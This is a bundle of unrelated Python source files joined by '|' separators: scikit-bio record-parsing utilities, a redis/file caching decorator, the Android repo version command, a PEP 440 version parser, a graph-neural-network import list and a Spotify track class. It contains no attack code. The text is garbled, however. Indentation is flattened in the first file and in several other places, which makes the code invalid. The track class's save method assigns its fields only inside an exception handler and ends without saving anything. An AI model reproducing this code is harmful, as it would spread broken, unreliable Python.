# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from future.utils import viewitems
from numbers import Integral
from copy import deepcopy
from skbio.io import FieldError
def string_and_strip(*items):
"""Converts items to strings and strips them."""
return [str(i).strip() for i in items]
def DelimitedSplitter(delimiter=None, max_splits=1):
"""Returns function that returns stripped fields split by delimiter.
Unlike the default behavior of split, max_splits can be negative, in
which case it counts from the end instead of the start (i.e. splits
at the _last_ delimiter, last two delimiters, etc. for -1, -2, etc.)
    However, if the delimiter is None (the default) and max_splits is
    negative, internal runs of whitespace will not be preserved.
Note: leaves empty fields in place.
"""
is_int = isinstance(max_splits, Integral)
if is_int and (max_splits > 0):
def parser(line):
return [i.strip() for i in line.split(delimiter, max_splits)]
elif is_int and (max_splits < 0):
def parser(line):
to_insert = delimiter or ' ' # re-join fields w/ space if None
fields = line.split(delimiter)
if (fields == []) or (fields == ['']):
return [] # empty string or only delimiter: return nothing
            # if not enough fields, count from the start, not the end
            # (max_splits is negative in this branch, hence the sign flip)
            if len(fields) < -max_splits:
                first_fields = fields[0:1]
                last_fields = fields[1:]
# otherwise, count off the last n fields and join the remainder
else:
first_fields = fields[:max_splits]
last_fields = fields[max_splits:]
pieces = []
# if first_fields is empty, don't make up an extra empty string
if first_fields:
pieces.append(to_insert.join(first_fields))
pieces.extend(last_fields)
return [i.strip() for i in pieces]
else: # ignore max_splits if it was 0
def parser(line):
return [i.strip() for i in line.split(delimiter)]
return parser
# The following provide examples of the kinds of functions DelimitedSplitter
# returns.
semi_splitter = DelimitedSplitter(';', None)
space_pairs = DelimitedSplitter(None)
equal_pairs = DelimitedSplitter('=')
last_colon = DelimitedSplitter(':', -1)
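# For example (illustrative), the splitters above behave as follows:
#
#   equal_pairs('key = value')   -> ['key', 'value']
#   last_colon('a:b:c')          -> ['a:b', 'c']
#   semi_splitter('x; y; z')     -> ['x', 'y', 'z']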
class GenericRecord(dict):
"""Holds data for a generic field ->: value mapping.
Override Required with {name:prototype} mapping. Each required name
will get a deepcopy of its prototype. For example, use an empty list to
guarantee that each instance has its own list for a particular field to
which items can be appended.
Raises AttributeError on attempt to delete required item, but does not
raise an exception on attempt to delete absent item.
This class explicitly does _not_ override __getitem__ or __setitem__ for
performance reasons: if you need to transform keys on get/set or if you
need to access items as attributes and vice versa, use MappedRecord
instead.
"""
Required = {}
def __init__(self, *args, **kwargs):
"""Reads kwargs as properties of self."""
# perform init on temp dict to preserve interface: will then translate
# aliased keys when loading into self
temp = {}
dict.__init__(temp, *args, **kwargs)
self.update(temp)
for name, prototype in viewitems(self.Required):
if name not in self:
self[name] = deepcopy(prototype)
def __delitem__(self, item):
"""Deletes item or raises exception if item required.
Note: Fails silently if item absent.
"""
if item in self.Required:
raise AttributeError("%s is a required item" % (item,))
try:
super(GenericRecord, self).__delitem__(item)
except KeyError:
pass
def copy(self):
"""Coerces copy to correct type"""
temp = self.__class__(super(GenericRecord, self).copy())
# don't forget to copy attributes!
for attr, val in viewitems(self.__dict__):
temp.__dict__[attr] = deepcopy(val)
return temp
class MappedRecord(GenericRecord):
"""GenericRecord that maps names of fields onto standardized names.
Override Aliases in subclass for new mapping of OldName->NewName. Each
OldName can have only one NewName, but it's OK if several OldNames map
to the same NewName.
Note: can access fields either as items or as attributes. In addition,
can access either using nonstandard names or using standard names.
Implementation note: currently, just a dict with appropriate get/set
overrides and ability to access items as attributes. Attribute access
is about 10x slower than in GenericRecord, so make sure you need the
additional capabilities if you use MappedRecord instead of GenericRecord.
WARNING: MappedRecord pretends to have every attribute, so will never raise
AttributeError when trying to find an unknown attribute. This feature can
cause surprising interactions when a Delegator is delegating its
attributes to a MappedRecord, since any attributes defined in __init__ will
be set in the MappedRecord and not in the object itself. The solution is
to use the self.__dict__['AttributeName'] = foo syntax to force the
attributes to be set in the object and not the MappedRecord to which it
forwards.
"""
Aliases = {}
DefaultValue = None
def _copy(self, prototype):
"""Returns a copy of item."""
if hasattr(prototype, 'copy'):
return prototype.copy()
elif isinstance(prototype, list):
return prototype[:]
elif (isinstance(prototype, str) or isinstance(prototype, int) or
isinstance(prototype, tuple) or isinstance(prototype, complex) or
prototype is None):
return prototype # immutable type: use directly
else:
return deepcopy(prototype)
def __init__(self, *args, **kwargs):
"""Reads kwargs as properties of self."""
# perform init on temp dict to preserve interface: will then translate
# aliased keys when loading into self
temp = {}
unalias = self.unalias
dict.__init__(temp, *args, **kwargs)
for key, val in viewitems(temp):
self[unalias(key)] = val
for name, prototype in viewitems(self.Required):
new_name = unalias(name)
if new_name not in self:
self[new_name] = self._copy(prototype)
def unalias(self, key):
"""Returns dealiased name for key, or key if not in alias."""
try:
return self.Aliases.get(key, key)
except TypeError:
return key
def __getattr__(self, attr):
"""Returns None if field is absent, rather than raising exception."""
if attr in self:
return self[attr]
elif attr in self.__dict__:
return self.__dict__[attr]
elif attr.startswith('__'): # don't retrieve private class attrs
raise AttributeError
elif hasattr(self.__class__, attr):
return getattr(self.__class__, attr)
else:
return self._copy(self.DefaultValue)
def __setattr__(self, attr, value):
"""Sets attribute in self if absent, converting name if necessary."""
normal_attr = self.unalias(attr)
# we overrode __getattr__, so have to simulate getattr(self, attr) by
# calling superclass method and checking for AttributeError.
# BEWARE: dict defines __getattribute__, not __getattr__!
try:
super(MappedRecord, self).__getattribute__(normal_attr)
super(MappedRecord, self).__setattr__(normal_attr, value)
except AttributeError:
self[normal_attr] = value
def __delattr__(self, attr):
"""Deletes attribute, converting name if necessary. Fails silently."""
normal_attr = self.unalias(attr)
if normal_attr in self.Required:
raise AttributeError("%s is a required attribute" % (attr,))
else:
try:
super(MappedRecord, self).__delattr__(normal_attr)
except AttributeError:
del self[normal_attr]
def __getitem__(self, item):
"""Returns default if item is absent, rather than raising exception."""
normal_item = self.unalias(item)
return self.get(normal_item, self._copy(self.DefaultValue))
def __setitem__(self, item, val):
"""Sets item, converting name if necessary."""
super(MappedRecord, self).__setitem__(self.unalias(item), val)
def __delitem__(self, item):
"""Deletes item, converting name if necessary. Fails silently."""
normal_item = self.unalias(item)
super(MappedRecord, self).__delitem__(normal_item)
def __contains__(self, item):
"""Tests membership, converting name if necessary."""
return super(MappedRecord, self).__contains__(self.unalias(item))
def get(self, item, default):
"""Returns self[item] or default if not present. Silent on unhashable.
"""
try:
return super(MappedRecord, self).get(self.unalias(item), default)
except TypeError:
return default
def setdefault(self, key, default=None):
"""Returns self[key] or default (and sets self[key]=default)"""
return super(MappedRecord, self).setdefault(self.unalias(key), default)
def update(self, *args, **kwargs):
"""Updates self with items in other"""
temp = {}
unalias = self.unalias
temp.update(*args, **kwargs)
for key, val in viewitems(temp):
self[unalias(key)] = val
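# Illustrative use of aliasing (hypothetical subclass): items and attributes
# set under an old name are stored under, and retrievable by, the new name,
# and absent fields yield DefaultValue rather than raising.
#
#   class _Demo(MappedRecord):
#       Aliases = {'OldName': 'new_name'}
#
#   d = _Demo()
#   d['OldName'] = 3
#   d.new_name        # -> 3
#   d.missing_field   # -> None (DefaultValue), not AttributeError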
# The following methods are useful for handling particular types of fields in
# line-oriented parsers
def TypeSetter(constructor=None):
"""Returns function that takes obj, field, val and sets obj.field = val.
constructor can be any callable that returns an object.
"""
if constructor:
def setter(obj, field, val):
setattr(obj, field, constructor(val))
else:
def setter(obj, field, val):
setattr(obj, field, val)
return setter
int_setter = TypeSetter(int)
str_setter = TypeSetter(str)
list_setter = TypeSetter(list)
tuple_setter = TypeSetter(tuple)
dict_setter = TypeSetter(dict)
float_setter = TypeSetter(float)
complex_setter = TypeSetter(complex)
bool_setter = TypeSetter(bool)
identity_setter = TypeSetter()
def list_adder(obj, field, val):
"""Adds val to list in obj.field, creating list if necessary."""
try:
getattr(obj, field).append(val)
except AttributeError:
setattr(obj, field, [val])
def dict_adder(obj, field, val):
"""If val is a sequence, adds key/value pair in obj.field: else adds key.
"""
try:
key, value = val
except (ValueError, TypeError):
key, value = val, None
try:
getattr(obj, field)[key] = value
except AttributeError:
setattr(obj, field, {key: value})
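# Example behavior (illustrative): both adders create the container on
# first use, then accumulate into it.
#
#   rec = MappedRecord()
#   list_adder(rec, 'hits', 1)
#   list_adder(rec, 'hits', 2)            # rec.hits == [1, 2]
#   dict_adder(rec, 'pairs', ('k', 'v'))  # rec.pairs == {'k': 'v'}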
class LineOrientedConstructor(object):
"""Constructs a MappedRecord from a sequence of lines."""
def __init__(self, Lines=None, LabelSplitter=space_pairs, FieldMap=None,
Constructor=MappedRecord, Strict=False):
"""Returns new LineOrientedConstructor.
Fields:
Lines: set of lines to construct record from (for convenience).
Default is None.
LabelSplitter: function that returns (label, data) tuple.
Default is to split on first space and strip components.
FieldMap: dict of {fieldname:handler} functions. Each function
has the signature (obj, field, val) and performs an inplace
action like setting field to val or appending val to field.
Default is empty dict.
Constructor: constructor for the resulting object.
Default is MappedRecord: beware of using constructors that don't
subclass MappedRecord.
Strict: boolean controlling whether to raise error on unrecognized
field. Default is False.
"""
self.Lines = Lines or []
self.LabelSplitter = LabelSplitter
self.FieldMap = FieldMap or {}
self.Constructor = Constructor
self.Strict = Strict
def __call__(self, Lines=None):
"""Returns the record constructed from Lines, or self.Lines"""
if Lines is None:
Lines = self.Lines
result = self.Constructor()
fieldmap = self.FieldMap
aka = result.unalias
splitter = self.LabelSplitter
for line in Lines:
            # find out how many items we got, setting key and val appropriately
items = list(splitter(line))
num_items = len(items)
if num_items == 2: # typical case: key-value pair
raw_field, val = items
elif num_items > 2:
raw_field = items[0]
val = items[1:]
elif len(items) == 1:
raw_field, val = items[0], None
elif not items: # presumably had line with just a delimiter?
continue
# figure out if we know the field under its original name or as
# an alias
if raw_field in fieldmap:
field, mapper = raw_field, fieldmap[raw_field]
else:
new_field = aka(raw_field)
if new_field in fieldmap:
field, mapper = new_field, fieldmap[new_field]
else:
if self.Strict:
raise FieldError(
"Got unrecognized field %s" %
(raw_field,))
else:
identity_setter(result, raw_field, val)
continue
# if we found the field in the fieldmap, apply the correct function
try:
mapper(result, field, val)
except: # Warning: this is a catchall for _any_ exception,
# and may mask what's actually going wrong.
if self.Strict:
raise FieldError("Could not handle line %s" % (line,))
return result
def FieldWrapper(fields, splitter=None, constructor=None):
"""Returns dict containing field->val mapping, one level.
fields should be list of fields, in order.
splitter should be something like a DelimitedSplitter that converts the
line into a sequence of fields.
constructor is a callable applied to the dict after construction.
Call result on a _single_ line, not a list of lines.
Note that the constructor should take a dict and return an object of some
useful type. Additionally, it is the _constructor's_ responsibility to
complain if there are not enough fields, since zip will silently truncate
at the shorter sequence. This is actually useful in the case where many of
the later fields are optional.
"""
if splitter is None:
splitter = DelimitedSplitter(None, None)
if constructor:
def parser(line):
return constructor(dict(zip(fields, splitter(line))))
else:
def parser(line):
return dict(zip(fields, splitter(line)))
return parser
def StrictFieldWrapper(fields, splitter=None, constructor=None):
"""Returns dict containing field->val mapping, one level.
fields should be list of fields, in order.
splitter should be something like a DelimitedSplitter that converts the
line into a sequence of fields.
constructor is a callable applied to the dict after construction.
Call result on a _single_ line, not a list of lines.
Note that the constructor should take a dict and return an object of some
useful type. Raises RecordError if the wrong number of fields are returned
from the split.
"""
if splitter is None:
splitter = DelimitedSplitter(None, None)
if constructor:
def parser(line):
items = splitter(line)
if len(items) != len(fields):
raise FieldError("Expected %s items but got %s: %s" %
(len(fields), len(items), items))
return constructor(dict(zip(fields, items)))
else:
def parser(line):
items = splitter(line)
if len(items) != len(fields):
raise FieldError("Expected %s items but got %s: %s" %
(len(fields), len(items), items))
return dict(zip(fields, items))
return parser
def raise_unknown_field(field, data):
"""Raises a FieldError, displaying the offending field and data."""
raise FieldError("Got unknown field %s with data %s" % (field, data))
class FieldMorpher(object):
"""When called, applies appropriate constructors to each value of dict.
Initialize using a dict of fieldname:constructor pairs.
"""
def __init__(self, Constructors, Default=raise_unknown_field):
"""Returns a new FieldMorpher, using appropriate constructors.
If a field is unknown, will try to set key and value to the results
of Default(key, value): in other words, the signature of Default should
take a key and a value and should return a key and a value. The
built-in value of Default raises a FieldError instead, but it will
often be useful to do things like return the key/value pair unchanged,
or to strip the key and the value and then add them.
"""
self.Constructors = Constructors
self.Default = Default
def __call__(self, data):
"""Returns a new dict containing information converted from data."""
result = {}
default = self.Default
cons = self.Constructors
for key, val in viewitems(data):
if key in cons:
result[key] = cons[key](val)
else:
new_key, new_val = default(key, val)
# if we now recognize the key, use its constructor on the old
# val
if new_key in cons:
result[new_key] = cons[new_key](val)
# otherwise, enter the new key and the new val
else:
result[new_key] = new_val
return result
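# Illustrative use: apply per-field constructors, falling back to Default
# for unknown keys (here, a lambda that just strips the key).
#
#   morph = FieldMorpher({'count': int, 'score': float},
#                        Default=lambda key, val: (key.strip(), val))
#   morph({'count': '3', 'score': '0.5', ' note ': 'x'})
#   # -> {'count': 3, 'score': 0.5, 'note': 'x'}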
|
import datetime
import functools
import inspect
import json
import logging
import os
from typing import Callable, Dict, Optional
import async_lru
import gamla
import redis
from cloud_utils.cache import file_store, redis_utils
_RESULT_HASH_KEY = "result_hash"
_LAST_RUN_TIMESTAMP = "last_run_timestamp"
class VersionNotFound(Exception):
pass
@gamla.curry
def _write_to_cache_file(
cache_file_name: str,
identifier: str,
extra_fields: Dict,
hash_to_load: str,
):
cache_file = file_store.open_file("r+")(cache_file_name)
new_versions_dict = gamla.pipe(
cache_file,
json.load,
gamla.add_key_value(
identifier,
{
_RESULT_HASH_KEY: hash_to_load,
_LAST_RUN_TIMESTAMP: datetime.datetime.now().isoformat(),
**extra_fields,
},
),
dict.items,
sorted,
dict,
)
cache_file.seek(0)
json.dump(new_versions_dict, cache_file, indent=2)
cache_file.write("\n")
cache_file.truncate()
def _time_since_last_updated(
identifier: str,
) -> Callable[[Dict], Optional[datetime.timedelta]]:
return gamla.compose_left(
gamla.get_in_or_none([identifier, _LAST_RUN_TIMESTAMP]),
gamla.unless(
gamla.equals(None),
gamla.compose_left(
datetime.datetime.fromisoformat,
lambda last_updated: datetime.datetime.now() - last_updated,
),
),
)
_total_hours_since_update = gamla.ternary(
gamla.equals(None),
gamla.just(0),
gamla.compose_left(lambda time_span: time_span.total_seconds() / 3600, round),
)
def _get_cache_filename(
cache_file_name: str,
factory: Callable,
) -> str:
cache_file = os.path.join(
os.path.dirname(factory.__code__.co_filename),
cache_file_name,
)
if not os.path.isfile(cache_file):
with open(cache_file, "w") as f:
f.write("{}\n")
return cache_file
def auto_updating_cache(
factory: Callable,
cache_file_name: str,
save_local: bool,
bucket_name: str,
should_update: Callable[[Optional[datetime.timedelta]], bool],
) -> Callable:
cache_file = _get_cache_filename(cache_file_name, factory)
extra_fields = {
"filename": os.path.basename(factory.__code__.co_filename),
"lineno": factory.__code__.co_firstlineno,
}
identifier = gamla.function_to_uid(factory)
return gamla.compose_left(
gamla.just(cache_file),
file_store.open_file("r"),
json.load,
gamla.side_effect(
gamla.compose_left(
_time_since_last_updated(identifier),
_total_hours_since_update,
lambda hours_since_last_update: f"Loading cache for [{identifier}]. Last updated {hours_since_last_update} hours ago.",
logging.info,
),
),
gamla.ternary(
gamla.compose_left(_time_since_last_updated(identifier), should_update),
gamla.compose_left(
gamla.ignore_input(factory),
file_store.save_to_bucket_return_hash(save_local, bucket_name),
gamla.side_effect(
_write_to_cache_file(
cache_file,
identifier,
extra_fields,
),
),
gamla.log_text(f"Finished updating cache for [{identifier}]."),
),
gamla.get_in([identifier, _RESULT_HASH_KEY]),
),
)
def persistent_cache(
redis_client: redis.Redis,
name: str,
environment: str,
is_external: bool,
num_misses_to_trigger_sync: int,
) -> Callable:
maxsize = 10_000
def simple_decorator(func):
if inspect.iscoroutinefunction(func):
return async_lru.alru_cache(maxsize=maxsize)(func)
return functools.lru_cache(maxsize=maxsize)(func)
if not is_external and environment in ("production", "staging", "development"):
return simple_decorator
if environment in ("production", "staging", "development"):
get_cache_item, set_cache_item = redis_utils.make_redis_store(
redis_client,
environment,
name,
)
else:
get_cache_item, set_cache_item = file_store.make_file_store(
name,
num_misses_to_trigger_sync,
)
def decorator(func):
@functools.wraps(func)
async def wrapper_async(*args, **kwargs):
key = gamla.make_call_key(args, kwargs)
try:
return get_cache_item(key)
except KeyError:
result = await func(*args, **kwargs)
set_cache_item(key, result)
return result
@functools.wraps(func)
def wrapper(*args, **kwargs):
key = gamla.make_call_key(args, kwargs)
try:
return get_cache_item(key)
except KeyError:
result = func(*args, **kwargs)
set_cache_item(key, result)
return result
if inspect.iscoroutinefunction(func):
return wrapper_async
return wrapper
return decorator
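# Usage sketch (hypothetical names; assumes a reachable Redis instance when
# environment is production/staging/development and is_external is True):
#
#   cache = persistent_cache(
#       redis.Redis(), name="embeddings", environment="production",
#       is_external=True, num_misses_to_trigger_sync=100,
#   )
#
#   @cache
#   def embed(text: str) -> list: ...
#
# Sync and async functions are both supported: the decorator picks the
# right wrapper via inspect.iscoroutinefunction.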
|
#
# Copyright (C) 2009 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from command import Command, MirrorSafeCommand
from git_command import git
from project import HEAD
class Version(Command, MirrorSafeCommand):
wrapper_version = None
wrapper_path = None
common = False
helpSummary = "Display the version of repo"
helpUsage = """
%prog
"""
def Execute(self, opt, args):
rp = self.manifest.repoProject
rem = rp.GetRemote(rp.remote.name)
        print('repo version %s' % rp.work_git.describe(HEAD))
        print(' (from %s)' % rem.url)
        if Version.wrapper_path is not None:
            print('repo launcher version %s' % Version.wrapper_version)
            print(' (from %s)' % Version.wrapper_path)
        print(git.version().strip())
        print('Python %s' % sys.version)
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import collections
import itertools
import re
from ._structures import Infinity
__all__ = [
"parse", "Version", "LegacyVersion", "InvalidVersion", "VERSION_PATTERN"
]
_Version = collections.namedtuple(
"_Version",
["epoch", "release", "dev", "pre", "post", "local"],
)
def parse(version):
"""
Parse the given version string and return either a :class:`Version` object
or a :class:`LegacyVersion` object depending on if the given version is
a valid PEP 440 version or a legacy version.
"""
try:
return Version(version)
except InvalidVersion:
return LegacyVersion(version)
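# For instance (illustrative): parse("1.0.post1") yields a Version, while a
# string like "french toast" that PEP 440 cannot describe falls back to a
# LegacyVersion instead of raising.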
class InvalidVersion(ValueError):
"""
An invalid version was found, users should refer to PEP 440.
"""
class _BaseVersion(object):
def __hash__(self):
return hash(self._key)
def __lt__(self, other):
return self._compare(other, lambda s, o: s < o)
def __le__(self, other):
return self._compare(other, lambda s, o: s <= o)
def __eq__(self, other):
return self._compare(other, lambda s, o: s == o)
def __ge__(self, other):
return self._compare(other, lambda s, o: s >= o)
def __gt__(self, other):
return self._compare(other, lambda s, o: s > o)
def __ne__(self, other):
return self._compare(other, lambda s, o: s != o)
def _compare(self, other, method):
if not isinstance(other, _BaseVersion):
return NotImplemented
return method(self._key, other._key)
class LegacyVersion(_BaseVersion):
def __init__(self, version):
self._version = str(version)
self._key = _legacy_cmpkey(self._version)
def __str__(self):
return self._version
def __repr__(self):
return "<LegacyVersion({})>".format(repr(str(self)))
@property
def public(self):
return self._version
@property
def base_version(self):
return self._version
@property
def local(self):
return None
@property
def is_prerelease(self):
return False
@property
def is_postrelease(self):
return False
_legacy_version_component_re = re.compile(
r"(\d+ | [a-z]+ | \.| -)", re.VERBOSE,
)
_legacy_version_replacement_map = {
"pre": "c", "preview": "c", "-": "final-", "rc": "c", "dev": "@",
}
def _parse_version_parts(s):
for part in _legacy_version_component_re.split(s):
part = _legacy_version_replacement_map.get(part, part)
if not part or part == ".":
continue
if part[:1] in "0123456789":
# pad for numeric comparison
yield part.zfill(8)
else:
yield "*" + part
# ensure that alpha/beta/candidate are before final
yield "*final"
def _legacy_cmpkey(version):
    # We hardcode an epoch of -1 here. A PEP 440 version can only have an
    # epoch greater than or equal to 0. This will effectively put the
    # LegacyVersion, which uses the de facto standard originally implemented
    # by setuptools, before all PEP 440 versions.
    epoch = -1
    # This scheme is taken from pkg_resources.parse_version in setuptools,
    # prior to its adoption of the packaging library.
parts = []
for part in _parse_version_parts(version.lower()):
if part.startswith("*"):
# remove "-" before a prerelease tag
if part < "*final":
while parts and parts[-1] == "*final-":
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == "00000000":
parts.pop()
parts.append(part)
parts = tuple(parts)
return epoch, parts
# Deliberately not anchored to the start and end of the string, to make it
# easier for 3rd party code to reuse
VERSION_PATTERN = r"""
v?
(?:
(?:(?P<epoch>[0-9]+)!)? # epoch
(?P<release>[0-9]+(?:\.[0-9]+)*) # release segment
(?P<pre> # pre-release
[-_\.]?
(?P<pre_l>(a|b|c|rc|alpha|beta|pre|preview))
[-_\.]?
(?P<pre_n>[0-9]+)?
)?
(?P<post> # post release
(?:-(?P<post_n1>[0-9]+))
|
(?:
[-_\.]?
(?P<post_l>post|rev|r)
[-_\.]?
(?P<post_n2>[0-9]+)?
)
)?
(?P<dev> # dev release
[-_\.]?
(?P<dev_l>dev)
[-_\.]?
(?P<dev_n>[0-9]+)?
)?
)
(?:\+(?P<local>[a-z0-9]+(?:[-_\.][a-z0-9]+)*))? # local version
"""
class Version(_BaseVersion):
_regex = re.compile(
r"^\s*" + VERSION_PATTERN + r"\s*$",
re.VERBOSE | re.IGNORECASE,
)
def __init__(self, version):
# Validate the version and parse it into pieces
match = self._regex.search(version)
if not match:
raise InvalidVersion("Invalid version: '{}'".format(version))
# Store the parsed out pieces of the version
self._version = _Version(
epoch=int(match.group("epoch")) if match.group("epoch") else 0,
release=tuple(int(i) for i in match.group("release").split(".")),
pre=_parse_letter_version(
match.group("pre_l"),
match.group("pre_n"),
),
post=_parse_letter_version(
match.group("post_l"),
match.group("post_n1") or match.group("post_n2"),
),
dev=_parse_letter_version(
match.group("dev_l"),
match.group("dev_n"),
),
local=_parse_local_version(match.group("local")),
)
# Generate a key which will be used for sorting
self._key = _cmpkey(
self._version.epoch,
self._version.release,
self._version.pre,
self._version.post,
self._version.dev,
self._version.local,
)
def __repr__(self):
return "<Version({})>".format(repr(str(self)))
def __str__(self):
parts = []
# Epoch
if self._version.epoch != 0:
parts.append("{}!".format(self._version.epoch))
# Release segment
parts.append(".".join(str(x) for x in self._version.release))
# Pre-release
if self._version.pre is not None:
parts.append("".join(str(x) for x in self._version.pre))
# Post-release
if self._version.post is not None:
parts.append(".post{}".format(self._version.post[1]))
# Development release
if self._version.dev is not None:
parts.append(".dev{}".format(self._version.dev[1]))
# Local version segment
if self._version.local is not None:
parts.append(
"+{}".format(".".join(str(x) for x in self._version.local))
)
return "".join(parts)
@property
def public(self):
return str(self).split("+", 1)[0]
@property
def base_version(self):
parts = []
# Epoch
if self._version.epoch != 0:
parts.append("{}!".format(self._version.epoch))
# Release segment
parts.append(".".join(str(x) for x in self._version.release))
return "".join(parts)
@property
def local(self):
version_string = str(self)
if "+" in version_string:
return version_string.split("+", 1)[1]
@property
def is_prerelease(self):
return bool(self._version.dev or self._version.pre)
@property
def is_postrelease(self):
return bool(self._version.post)
def _parse_letter_version(letter, number):
if letter:
# We consider there to be an implicit 0 in a pre-release if there is
# not a numeral associated with it.
if number is None:
number = 0
# We normalize any letters to their lower case form
letter = letter.lower()
# We consider some words to be alternate spellings of other words and
# in those cases we want to normalize the spellings to our preferred
# spelling.
if letter == "alpha":
letter = "a"
elif letter == "beta":
letter = "b"
elif letter in ["c", "pre", "preview"]:
letter = "rc"
elif letter in ["rev", "r"]:
letter = "post"
return letter, int(number)
if not letter and number:
# We assume if we are given a number, but we are not given a letter
# then this is using the implicit post release syntax (e.g. 1.0-1)
letter = "post"
return letter, int(number)
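# A couple of illustrative calls (a sketch of the normalization above):
# >>> _parse_letter_version("Alpha", None)
# ('a', 0)
# >>> _parse_letter_version(None, "2")
# ('post', 2)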
_local_version_separators = re.compile(r"[\._-]")
def _parse_local_version(local):
"""
Takes a string like abc.1.twelve and turns it into ("abc", 1, "twelve").
"""
if local is not None:
return tuple(
part.lower() if not part.isdigit() else int(part)
            for part in _local_version_separators.split(local)
)
def _cmpkey(epoch, release, pre, post, dev, local):
    # When we compare a release version, we want to compare it with all of the
    # trailing zeros removed. So we'll reverse the list, drop all the now-leading
    # zeros until we come to something non-zero, then re-reverse the rest back
    # into the correct order and make it a tuple to use as our sorting key.
release = tuple(
reversed(list(
itertools.dropwhile(
lambda x: x == 0,
reversed(release),
)
))
)
# We need to "trick" the sorting algorithm to put 1.0.dev0 before 1.0a0.
# We'll do this by abusing the pre segment, but we _only_ want to do this
# if there is not a pre or a post segment. If we have one of those then
# the normal sorting rules will handle this case correctly.
if pre is None and post is None and dev is not None:
pre = -Infinity
# Versions without a pre-release (except as noted above) should sort after
# those with one.
elif pre is None:
pre = Infinity
# Versions without a post segment should sort before those with one.
if post is None:
post = -Infinity
# Versions without a development segment should sort after those with one.
if dev is None:
dev = Infinity
if local is None:
# Versions without a local segment should sort before those with one.
local = -Infinity
else:
# Versions with a local segment need that segment parsed to implement
# the sorting rules in PEP440.
# - Alpha numeric segments sort before numeric segments
# - Alpha numeric segments sort lexicographically
# - Numeric segments sort numerically
# - Shorter versions sort before longer versions when the prefixes
# match exactly
local = tuple(
(i, "") if isinstance(i, int) else (-Infinity, i)
for i in local
)
return epoch, release, pre, post, dev, local
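# A quick illustration of the resulting PEP 440 ordering (a sketch, using
# Version objects built from this module):
# Version("1.0.dev0") < Version("1.0a1") < Version("1.0rc1") < Version("1.0")
# Version("1.0") < Version("1.0.post1"), and Version("1.0+local") > Version("1.0")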
|
from .compgcn import CompGCN, CompGCNLayer
from .dgi import DGI, DGIModel
from .disengcn import DisenGCN, DisenGCNLayer
from .gat import PetarVSpGAT, SpGraphAttentionLayer
from .gcn import GraphConvolution, TKipfGCN
from .gcnii import GCNIILayer, GCNII
from .gdc_gcn import GDC_GCN
from .grace import GRACE, GraceEncoder
from .graphsage import Graphsage, GraphSAGELayer
from .hgpsl import HGPSL, HGPSLPool
from .mvgrl import MVGRL
from .pairnorm import PairNorm
from .patchy_san import PatchySAN
from .ppnp import PPNP
from .pyg_cheb import Chebyshev
from .pyg_deepergcn import DeeperGCN, DeepGCNLayer
from .pyg_dgcnn import DGCNN
from .pyg_diffpool import DiffPool, BatchedDiffPool, BatchedDiffPoolLayer
from .pyg_drgat import DrGAT
from .pyg_drgcn import DrGCN
from .pyg_gcnmix import GCNMix
from .pyg_gin import GINLayer, GINMLP
from .pyg_grand import Grand
from .pyg_gpt_gnn import GPT_GNN
from .pyg_gtn import GTConv, GTLayer, GTN
from .pyg_han import HAN, HANLayer
from .pyg_infomax import Infomax
from .pyg_infograph import InfoGraph
from .pyg_sagpool import SAGPoolLayers, SAGPoolNetwork
from .pyg_sortpool import SortPool
from .pyg_srgcn import SRGCN
from .pyg_stpgnn import stpgnn
from .rgcn import RGCNLayer, LinkPredictRGCN, RGCN
from .sgc import SimpleGraphConvolution
|
import sys, os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from classes.downloader import Downloader
from scripts import setup
from typing import Dict
class Track:
    '''Track information and processing.'''
    def __init__(self, track: Dict = None, track_id=None) -> None:
        assert track is not None or track_id is not None, 'You must pass at least one parameter'
        if track:
            self.init_values(track)
        elif track_id:
            track = self.load_basic_song_data(track_id)
            self.init_values(track)
        else:
            raise ValueError('Cannot initialize Track')
def init_values(self, track:Dict):
'''Initialize basic Track properties.'''
#init basic properties
self.id = track['id']
self.uri = track['uri']
self.external_url = track['external_urls']['spotify']
self.name = track['name']
self.artist_name = track['artists'][0]['name']
self.artist_id = track['artists'][0]['id']
self.album_name = track['album']['name']
self.album_id = track['album']['id']
        # init additional properties
self.audio_features = track['audio_features'] if 'audio_features' in track else None
def __str__(self) -> str:
return f'{self.artist_name} song \'{self.name}\' from album \'{self.album_name}\''
def __repr__(self) -> str:
return f'{self.artist_name} song \'{self.name}\' from album \'{self.album_name}\''
def get_id(self) -> int:
'''Get track id.'''
return self.id
def get_uri(self) -> str:
'''Get track uri.'''
return self.uri
def set_additional_info(self, features) -> None:
'''Set track additional audio features property.'''
self.audio_features = features
def convert_to_array_for_classification(self) -> list:
'''
Convert audio features to array ready to pass into classification method.
Return elementwise list of necessary properties.
'''
if not self.audio_features:
self.load_additional_song_data()
keys = ['danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness','acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo']
return [ self.audio_features[k] for k in keys ]
def load_additional_song_data(self, downloader=None) -> None:
'''Download and load song characteristics like loudness, energy, liveness etc.'''
if not downloader:
            downloader = Downloader(setup.get_spotify_username())
self.audio_features = downloader.fetch_track_additional_info(self.id)
def load_basic_song_data(self, _id, downloader=None) -> Dict:
'''
Download track's basic data.
Return track in dictionary format.
'''
if not downloader:
            downloader = Downloader(setup.get_spotify_username())
return downloader.fetch_track_by_id(_id)
def save(self, filename='', downloader=None) -> None:
'''Save track to file. By default files are named by artist and song name.'''
if filename == '':
filename = f'{self.artist_name}_{self.name}.json'
if not downloader:
            downloader = Downloader(setup.get_spotify_username())
dic = dict()
try:
#get currently saved data
dic = downloader.read_json_from_file(filename)
        except Exception:
dic['id'] = self.id
dic['uri'] = self.uri
dic['external_url']= self.external_url
dic['name'] = self.name
dic['artist_name'] = self.artist_name
dic['artist_id'] = self.artist_id
dic['album_name']= self.album_name
dic['album_id'] = self.album_id
